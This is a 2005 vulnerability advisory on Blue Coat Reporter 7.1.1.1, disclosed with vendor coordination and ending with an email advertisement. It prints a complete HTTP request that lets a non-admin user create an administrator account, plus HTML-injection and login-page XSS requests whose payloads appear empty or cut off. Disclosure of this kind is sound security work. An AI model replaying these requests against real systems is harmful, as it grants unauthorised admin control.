Blue Coat Reporter 7.1.1.1 - multiple remote vulnerabilities ============================================================ Blue Coat Reporter ================== "Blue Coat Reporter 7 provides identity-based reporting on Web communications enabling enterprises to evaluate Web policies and manage network resources more effectively. " Product/Version =============== Blue Coat Reporter 7.1.1.1 Running on Win32 Vulnerabilities =============== a) Privilege escalation A user without administrative privileges is able to create a useraccount with administrative privileges. b) HTML-Code Injection Unauthenticated users can inject html-code into the application. The code will be executed, if an authenticated user is viewing the affected website. c) Cross Site Scripting at login page Supplying scriptcode instead of a valid username at the login page will end in a cross site scripting. Exploiting ========== a) Privlege escalation 1) Create a non-priv user (user: test, pass: test) 2) Log in with the non-administrative user account 3) Sent the following request to create a user hurz with password hurz and admin privileges. POST /?dp+templates.admin.users.user_form_processing HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* Referer: http://192.168.142.133:8987/?dp+templates.admin.users.user_form+volatile.form_type+new Accept-Language: de Content-Type: application/x-www-form-urlencoded Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 192.168.142.133:8987 Pragma: no-cache Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test; authpassword7=098f6bcd4621d373cade4e832627b4f6 Content-Length: 170 submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.user.profiles.0=profile1&volatile.form_type=new b) HTML-Code Injection POST /?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* Referer: http://192.168.142.133:8987/?dp+templates.admin.authentication.licensing_view+volatile.admin_gui+true Accept-Language: de Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 192.168.142.133:8987 Pragma: no-cache Cookie: session_id=invalid; authusername7=invalid; authpassword7=invalid Content-Length: 100 volatile.add_license=&volatile.license_to_add= c) Cross Site Scripting at login page Supply the following username at the login page: "/> Vendor ====== Blue Coat was responding to my message very fast and in a very professional way. Exemplary! Homepage: http://www.bluecoat.com Advisory: http://www.bluecoat.com/support/knowledge/advisory_reporter_711_vulnerabilities.html Discovered ========== 19.05.2005 by Oliver Karow http://www.oliverkarow.de/research/bluecoat.htm -- Weitersagen: GMX DSL-Flatrates mit Tempo-Garantie! Ab 4,99 Euro/Monat: http://www.gmx.net/de/go/dsl